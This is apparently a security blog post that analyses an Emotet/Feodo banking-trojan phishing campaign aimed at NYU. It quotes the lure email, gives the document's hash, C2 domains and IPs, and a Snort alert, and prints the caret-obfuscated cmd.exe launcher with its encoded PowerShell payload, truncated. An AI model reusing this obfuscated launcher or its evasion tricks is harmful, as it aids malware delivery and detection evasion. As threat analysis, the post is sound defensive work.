It all started with an e-mail from NYU: Received: from mx5.nyu.edu (MX5.NYU.EDU [22.214.171.124])
"From: xxxx xxxx <firstname.lastname@example.org> Sent: Monday, April 2, 2018 9:36 AM To: Infostruction Subject: ACH Payment Advice Good Afternoon, Please double check the payment for April 02, I have attached the WIRE. Invoice 98914 was paid on 04.01.2018. I want to make sure we are both on the same page. hxxp://agridron.com/INVOICE/GH-622577/ Thank you for your business! xxxxx xxxx"
We analyzed the malicious document this website (126.96.36.199) dropped:
SHA-256 f12642b8eb36637abaa85adbd559d056c36e2e013ca8f429236cd1fe0609c56a File name WIRE-FORM-DA-280819104.doc 17 engines detected this file VBA.Trojan-Downloader.Agent.cpw File names included WIRE-FORM-DA-280819104.doc, and ACH-FORM-GMU-89664246207.doc. As you may already know, these will change randomly. The doc launched cmd.exe, which launched powershell with an obfuscated script. It drops C:\Users\Public\183480.exe, file connects to frameyourdreams.in, IP 188.8.131.52:443 (WEDOS-HOSTING CZ), 184.108.40.206:80 (Online SAS), 220.127.116.11:8080, and 18.104.22.168:4143 (OVH Hosting, Inc.). Some of these are failback addresses, if SSL is filtered, it will use the proxy port, then 443, and finally 4143 Snort IDS:
2404328 ET CNC Feodo Tracker R eported Cn C Server T CP group 1 5 192.168. 2.2:49166 -> 31.31.7 8.203:443
These identifiers are a trademark of the Emotet Banking Trojan, aka Feodo Banking Malware which is known for it’s evasiveness, reported by a deep dive done by Trend Micro late 2017.
According to a site Feodo Tracker:
“Feodo (also known as Cridex or Bugat) is a Trojan used to commit ebanking fraud and steal sensitive information from the victims computer, such as credit card details or credentials”.
Not surprisingly, 83 C&C Servers for this Trojan are hosted by OVH, a company we’ve recently had run-ins with for our own web security.
Here’s the gnarly cmd.exe launched, with the Powershell entirely encoded inside of it. Notice the evasion of “comspec” “runtime” and other programming code in the strings. Generally, it’s just trying to evade any pattern matching that’s not expecting upper, and lower case. Both are supported, but one variation may break out of the regex, and not be detected.
Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' KILQtKwM EUtzhvFBAwAuznswikbwwPVaP kliPXChmV & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %PwdzSKirbBZnwpN%=RMcNzPtWSjXm&&set %TNPmzoqfKBJtPf%=p&&set %HAhQIKrGiYZZI%=o^w&&set %HIiAtXXuPowqDzz%=pYBbmzjRJlGAD&&set %iSmITuLLKO%=!%TNPmzoqfKBJtPf%!&&set %GilnvkTTZuYRTVd%=mKzPDjtfw&&set %OsRDrSjYFtE%=e^r&&set %VzCrYnrSpDY%=!%HAhQIKrGiYZZI%!&&set %bZTWFfOzSAOv%=s&&set %AJbRqHRXqJJNCIP%=WQicJTbDDXb&&set %obHkNaO%=he&&set %DvIsqYMIjvnM%=ll&&!%iSmITuLLKO%!!%VzCrYnrSpDY%!!%OsRDrSjYFtE%!!%bZTWFfOzSAOv%!!%obHkNaO%!!%DvIsqYMIjvnM%! '([ruNtIMe.iNTEroPSeRViCes.mARsHaL]::([RuNTIme.intERoPsERViCeS.maRsHAl].GeTMeMbERs().namE).InvOke( [rUnTIme.INTeropSErvIcEs.mArsHAL]::SeCuREstrINGtOglobAlallOCANsi( Powershell: $('76492d1116743f0423413b16050a5345MgB8AGwAYgAxAGkATABLAFAAWQBuAFIAWABWAEgAdQA4AHUAdABiAFQAbABPAFEAPQA9AHwAOAA2ADcAOQBkAGQAOQA3AGYANgA1ADEAYgAxAGIAYQA4ADUAMQA0AGUANAAxADIAMQA5AGIAZABmAGQAMQBhADEAMAA5ADgAZgA0ADcAMwBiAGQAYQBmADAAYwA4AGMAOAA4AGE
In some cases, it created this file, possibly to look innocuous:
The file C:\Users\XXXX\AppData\Local\Temp\TCD7340.tmp\Text Sidebar (Annual Report Red and Black design).docx. The file is not signed. The file was created by the script C:\Users\XXXX\Downloads\ACH-FORM-GMU-89664246207.doc after it established a TCP/80 connection to 22.214.171.124:80 (crl.microsoft.com, located in Louisville CO, United States)
Here’s a full breakdown, courtesy of JoeSandBox